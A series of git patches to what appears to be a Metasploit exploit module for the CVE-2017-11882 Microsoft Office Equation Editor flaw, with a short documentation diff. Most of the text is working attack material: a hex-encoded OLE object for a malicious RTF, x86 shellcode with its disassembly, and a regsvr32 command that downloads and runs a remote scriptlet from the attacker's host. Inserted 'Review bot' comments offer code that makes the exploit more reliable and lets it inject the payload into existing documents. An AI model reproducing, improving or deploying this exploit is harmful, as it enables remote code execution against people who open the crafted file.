'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' + header << '07400720079000000000000000000000000000000000000000000000000000000' + header << '00000000000000000000000000000000000016000500ffffffffffffffff02000' + header << '00002ce020000000000c0000000000000460000000000000000000000008020ce' + header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '000000000000001400000000000000010043006f006d0070004f0062006a00000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '0000000000000000000000000000120002010100000003000000ffffffff00000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' + header << '00000000000000000000000000000000000000000000000000000000000000003' + header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' + header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffff01000002080000000000000000000000000000000000000000000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' + header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << "00000300040000000000000000000000000000000000000000000000000000000" + header << "000000000000000000000000000000000000000000000000000000000000000\n" + + + shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00" + shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" + shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09" + shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53" + shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90" footer = 
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000' - footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000400' - footer << '0000C50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C' - footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000002' + footer << '4500710075006100740069006F006E0020004E006100740069007600650000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000400' + footer << '0000C5000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00' + footer << 
'000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF' + footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000001050000050000000D0000004D45544146494C' + footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C' + footer << '500000002001C0000000000050000000902000000000500000002' footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF' footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090' footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016' @@ -123,9 +178,6 @@ def generate_rtf footer << "}}}\n" footer << '\par}' + "\n" - shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" - shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10" - shellcode << "\x90\x90" payload = shellcode payload += [0x00402114].pack("V") 
@@ -133,13 +185,7 @@ def generate_rtf payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + payload + footer - - path = ::File.join(Msf::Config.local_directory, datastore['FILENAME']) - ::File.open(path, 'wb') do |fd| - fd.write(payload) - fd.close - end - print_good("Wrote payload to #{path}") + payload end @@ -207,6 +253,6 @@ def gen_sct_file(command) def primer - generate_rtf + file_create(generate_rtf) end end From 2544b4d8db4b4cad4af2d312bb32a8cde13fff88 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 28 Nov 2017 21:39:04 -0500 Subject: [PATCH 08/12] Change target name --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 47d486f73444..37f096f7ac11 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -33,7 +33,7 @@ def initialize(info = {}) 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ - ['Automatic', {} ], + ['Microsoft Office Word', {} ], ], 'DefaultTarget' => 0, 'Payload' => { From 7df46b33e88af63b98844eb4bceba16e40507c2b Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 1 Dec 2017 08:03:56 -0500 Subject: [PATCH 09/12] disassembly ASM --- .../windows/fileformat/office_ms17_11882.rb | 49 +++++++++++++++---- 1 file changed, 40 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 37f096f7ac11..6aafc49c14ec 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb 
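Review bot: generate_rtf still pads with `"\x00" * (197 - payload.length)` on the context line directly above the new `payload` return, so a `regsvr32` command longer than the fixed slot makes `String#*` raise ArgumentError (negative argument) instead of a clear module error. By the byte counts visible in the later hunks (an 82-byte stub, the 4-byte packed `0x00402114`, two NUL bytes) the command line gets 109 bytes, and `get_uri` with a long LHOST or URIPATH can easily exceed that. Add a guard before the padding line: `fail_with(Failure::BadConfig, "regsvr32 command exceeds the 109-byte slot; shorten LHOST/URIPATH") if payload.length > 197`. The start of generate_rtf lies outside this hunk.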
@@ -22,18 +22,17 @@ def initialize(info = {}) a length of 109 bytes to be executed Affects Microsoft Office word for the latest 17 years. }, - 'Author' => ['mumbai', 'embedi', 'BlackMathIT'], + 'Author' => ['mumbai', 'embedi'], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Nov 15 2017', 'References' => [ ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'], - ['URL', 'https://github.com/embedi/CVE-2017-11882'], - ['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py'] + ['URL', 'https://github.com/embedi/CVE-2017-11882'] ], 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ - ['Microsoft Office Word', {} ], + ['Microsoft Office', {} ], ], 'DefaultTarget' => 0, 'Payload' => { 
@@ -131,11 +130,43 @@ def generate_rtf header << "000000000000000000000000000000000000000000000000000000000000000\n" - shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00" - shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" - shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09" - shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53" - shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90" + shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 + shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al + shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax] + shellcode << "\x9e" # 6: 9e sahf + shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0] + shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\xc8" # f: 00 c8 add al,cl + shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi] + shellcode << "\\" # 12: 5c pop esp + shellcode << "\x00\xc4" # 13: 00 c4 add ah,al + shellcode << "\xee" # 15: ee out dx,al + shellcode << "[" # 16: 5b pop ebx + shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al + shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax + shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx] + shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx] + shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl + shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44 + shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678 + shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx + shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax] + shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << 
"\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c + shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx + shellcode << "\x53" # 3e: 53 push ebx + shellcode << "\x51" # 3f: 51 push ecx + shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64 + shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx + shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi] + shellcode << "\x53" # 49: 53 push ebx + shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c + shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax] + shellcode << "\x90" # 50: 90 nop + shellcode << "\x90" # 50: 90 nop footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' footer << '4500710075006100740069006F006E0020004E006100740069007600650000000' From c788e4e54066c9cc99a44a261a7a07bfa53199e0 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 1 Dec 2017 11:36:03 -0500 Subject: [PATCH 10/12] Update office_ms17_11882.rb --- .../windows/fileformat/office_ms17_11882.rb | 181 ++++++++++-------- 1 file changed, 104 insertions(+), 77 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 6aafc49c14ec..291fe040452b 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb 
@@ -46,88 +46,115 @@ def initialize(info = {}) )) register_options([ - OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"]) + OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]), + OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil]) ]) end + def retrieve_header(filename) + if (not datastore['FOLDER_PATH'].nil?) + path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}" + else + path = nil + end + if (not path.nil?) + if ::File.file?(path) + File.open(path, 'rb') do |fd| + header = fd.read(fd.stat.size).split('{\*\datastore').first + header = header.to_s # otherwise I get nil class... + print_status("Injecting #{path}...") + return header + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + end + else + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + end + return header + end + def generate_rtf - header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" - header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" - header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' - header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' - header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' - header << '09000600000000000000000000000100000001000000000000000010000002000' - header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' - header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' - header << '07400720079000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000016000500ffffffffffffffff02000' - header << '00002ce020000000000c0000000000000460000000000000000000000008020ce' - header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000001400000000000000010043006f006d0070004f0062006a00000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '0000000000000000000000000000120002010100000003000000ffffffff00000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' - header << '00000000000000000000000000000000000000000000000000000000000000003' - header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' - header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffff01000002080000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' - header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' - header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << "00000300040000000000000000000000000000000000000000000000000000000" - header << "000000000000000000000000000000000000000000000000000000000000000\n" + header = retrieve_header(datastore['FILENAME']) + object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' + object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' + object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + object_class << '09000600000000000000000000000100000001000000000000000010000002000' + object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' + object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' + object_class << '07400720079000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000' + object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce' + object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000003' + object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' + object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' + object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << "00000300040000000000000000000000000000000000000000000000000000000" + object_class << "000000000000000000000000000000000000000000000000000000000000000\n" shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 
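Review bot: retrieve_header ignores its `filename` parameter and reads `datastore['FILENAME']` instead, builds the path by string interpolation rather than `::File.join`, and when `split('{\*\datastore')` finds no marker it silently returns the whole source document (closing braces included) as the header, so the injected object ends up outside the RTF group; a missing file likewise falls back to the built-in preamble with no warning, and that preamble is duplicated in two branches. I would restructure it as below, failing fast on a missing file or marker and using `::File` consistently with the rest of the module. The hunk ends inside generate_rtf, whose remainder is outside this view.
```ruby
  def retrieve_header(filename)
    # Default RTF preamble, used unless an existing document is being injected.
    header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
    header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
    header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
    return header if datastore['FOLDER_PATH'].nil?

    path = ::File.join(datastore['FOLDER_PATH'], filename)
    fail_with(Failure::BadConfig, "#{path} does not exist or is not a regular file") unless ::File.file?(path)

    # Keep everything before the {\*\datastore group; the object is spliced in there.
    prefix, rest = ::File.binread(path).split('{\*\datastore', 2)
    fail_with(Failure::BadConfig, "no datastore group found in #{path}; is it a Word RTF document?") if rest.nil?
    print_status("Injecting #{path}...")
    prefix
  end
```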
@@ -215,7 +242,7 @@ def generate_rtf payload += "\x00" * 2 payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first - payload = header + payload + footer + payload = header + object_class + payload + footer payload end From b7f17f5519521c4d4716c26e0c9ced5c6342bc4a Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Mon, 4 Dec 2017 16:41:27 -0500 Subject: [PATCH 11/12] fix documentation --- .../exploit/windows/fileformat/office_ms17_11882.md | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md index b6b3ae81c6c1..b1b73d04683c 100644 --- a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md +++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md @@ -1,5 +1,5 @@ -Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim -to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user. + +Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. ## Vulnerable Application 
